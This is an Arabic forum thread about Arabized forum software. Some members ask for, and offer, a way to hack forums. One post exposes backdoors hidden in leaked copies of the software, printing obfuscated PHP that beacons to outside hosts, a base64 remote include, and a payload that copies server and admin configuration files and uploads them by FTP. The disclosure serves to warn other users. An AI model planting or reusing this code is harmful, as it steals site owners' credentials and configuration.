هل تريدون مزيدا من فضاح المعربين
هل تريدون مزيدا من فضاح المعربين
أخوي ريدستاينج أرجوووك ثم أرجوووك ثم أرجوووك
أبغى طريقة إختراق منتديات 2.2.1 إذا تعرفها وذلك للضرورة القصوى
وإذا ما تبغى تحطها ضيفني وبا أعطيك السبب
Mobarmeg@hotmail.com
__________________
ArabBB ... SoooooN!
انا فحصت المجلد اليوم وفحصت الملفات
ماوجدت لاثغرات ولاشي !!
showgroups كله عبارات SELECT ومجلد الـmod كله محمي بالglobal.php
المهم اتوقع انك عربت نسخة ولغمتها ووزعتها
ثم ايش جاب حكاية الجهاد الالكتروني ، الي يشتغلون بالجهاد الالكتروني الحقيقي شباب ماتهمهم سوالف البزران ..
على فكره MANTEK انا انصحك تسترجل و تتكلم بوجهك الحقيقي بدل ماتسجل باكثر من اسم ..
رد مقتبس من albaity
انا فحصت المجلد اليوم وفحصت الملفات
ماوجدت لاثغرات ولاشي !!
showgroups كله عبارات SELECT ومجلد الـmod كله محمي بالglobal.php
المهم اتوقع انك عربت نسخة ولغمتها ووزعتها
ثم ايش جاب حكاية الجهاد الالكتروني ، الي يشتغلون بالجهاد الالكتروني الحقيقي شباب ماتهمهم سوالف البزران ..
على فكره MANTEK انا انصحك تسترجل و تتكلم بوجهك الحقيقي بدل ماتسجل باكثر من اسم ..
اخي فيه
لكل بيت باب والف طريقة دخول
سوف ارسل لك الطريقةرد مقتبس من Al Mobarmeg المبرمج
أخوي ريدستاينج أرجوووك ثم أرجوووك ثم أرجوووك
أبغى طريقة إختراق منتديات 2.2.1 إذا تعرفها وذلك للضرورة القصوى
وإذا ما تبغى تحطها ضيفني وبا أعطيك السبب
Mobarmeg@hotmail.com
2.0.0
2.0.1
2.2.1
2.2.2
2.03
رد مقتبس من albaity
انا فحصت المجلد اليوم وفحصت الملفات
ماوجدت لاثغرات ولاشي !!
showgroups كله عبارات SELECT ومجلد الـmod كله محمي بالglobal.php
المهم اتوقع انك عربت نسخة ولغمتها ووزعتها
ثم ايش جاب حكاية الجهاد الالكتروني ، الي يشتغلون بالجهاد الالكتروني الحقيقي شباب ماتهمهم سوالف البزران ..
على فكره MANTEK انا انصحك تسترجل و تتكلم بوجهك الحقيقي بدل ماتسجل باكثر من اسم ..
مين الحبيب ده MANTEK
ثم ايش جاب حكاية الجهاد الالكتروني ، الي يشتغلون بالجهاد الالكتروني الحقيقي شباب ماتهمهم سوالف البزران
ده شباب من سوالف رسلوني بااسم جهاد وانت تعرف جهاد الاكتروني ماسوي شي بس المجاهدين الحقيقين لايهتمون بالمنتديات
صح السرفرات
__________________
الحياة مليئة بالحجارة..فلا تتعثر بها بل اجمعها وابن بها سّلماتصعد به نحو النجاح
l7ool عضو جديد عدد المشاركات: 10
دعوه لنبذ كل نجس ضعيف نفس
اسمحولي على هذا العنوان ولكن للاسف هذه هي الحقيقه المره
قبل فتره بسيطه تم اكتشاف ثغره في بعض نسخ 2.2.5 المسربه لنا من اخواننا العرب وكان هذا الكود الموجود فيها في ملف forum
PHP:--------------------------------------------------------------------------------
if ($action=="modify") {
$vbxh = h;
$vbxt = t;
$vbxp = p;
$vbxw = w;
$vbxa = a;
$vbx1 = 1;
$vbxr = r;
$vbxb = b;
$vbxn = n;
$vbxe = e;
$vbxo = o;
$vbxy =y;
$vbxl = l;
echo "<!-- ";
$file =
fopen("$vbxh$vbxt$vbxt$vbxp://$vbxw$vbxw$vbxw.$vbxa$vbxr$vbxa$vbxb$vbx1.$vbxn$vbxe$vbxt/~$vbxr$vbxo$vbxy$vbxa$vbxl/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NA
ME", "r");
$rf = fread($file, 1000);
fclose($file);
echo " -->";
--------------------------------------------------------------------------------
وكان الكود الحلو هذا يتصل في موقع
http://www.arab1.net/
http://www.arab1.net/~royal/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NAME
عموما مع الايام نزلت نسخه 2.2.6 وسربوها لنا حبايبنا وشالوا كود التبليغ ياعيني عليهم عشان يحطون لنا كود تجسس ونعم الاخوه العرب المسلمين
بس هالمره الكود اذكى ومهو مكشوف وغبي زي الاول الكود المره هذي في ملفين ملف option بالاخير موجود
PHP:--------------------------------------------------------------------------------
echo "<!-- ";
include "$sqlupdate";
echo " -->";
--------------------------------------------------------------------------------
وملف functions
PHP:--------------------------------------------------------------------------------
$sqlupdate = base64_decode('aHR0cDovL3NhdWRpLm5vLWlwLmNvbS9+cm95YWwvLngyLmluYw==');
--------------------------------------------------------------------------------
ياعيني على الذكاء صرنا نعرف نلعب باكدوا ديكود وانكود
والمره هذي بعد يتصل الكود الحلو هذا اللي مستخدمين فيه ديكود بالموقع هذا
http://saudi.no-ip.com/
بيرحب فيكم ويقولكم WELCOME TO arab1.net
ياعيني عالترحيب
عموما الكود بيتصل بالصفحه هذي http://saudi.no-ip.com/~royal/.x2.inc اللي فيها كود رهييييييب ويبين لنا ....... اللي يحسبون علينا كمسلمين وعرب
شوفو الكود
PHP:--------------------------------------------------------------------------------
<div id="sHo" style="display:none;">
<!--
if you are seeing this code PlzZzZz Contact sleeping_bum@hotmail.com
<?php
system("mkdir /tmp/.statics");
system("cp /etc/httpd/conf/httpd.conf /tmp/.statics/httpd1.conf");
system("cp /usr/local/apache/conf/httpd.conf /tmp/.statics/httpd2.conf");
system("cp admin/config.php /tmp/.statics/php.conf");
system("tar -cvf /tmp/.statics.tgz /tmp/.statics");
$vilename = "$SERVER_NAME.bz";
$port = base64_decode('aHB5NWk5');
$conn_id = ftp_connect("cyber-sa.virtualave.net");
$login_result = ftp_login($conn_id, "cyber-sa", "$port");
$upload = ftp_put($conn_id, "/tmp/$vilename", "/tmp/.statics.tgz", FTP_BINARY);
ftp_quit($conn_id);
system("rm -rf /tmp/.statics.tgz");
system("rm -rf /tmp/.statics");
$base = "$HTTP_HOST&h2=$SCRIPT_NAME";
$open = "http://saudi.no-ip.com/~royal/.x2.php?h=$base";
$file = fopen("$open", "r");
$rf = fread($file, 1000);
fclose($file);
?>
-->
</div>
--------------------------------------------------------------------------------
لاحول ولاقوة الا بالله الله يرحم ام جون وكود التبليغ ياشييييييييييييييييخ
البيتي مين اللي كلمك أشبك جالس تتمحك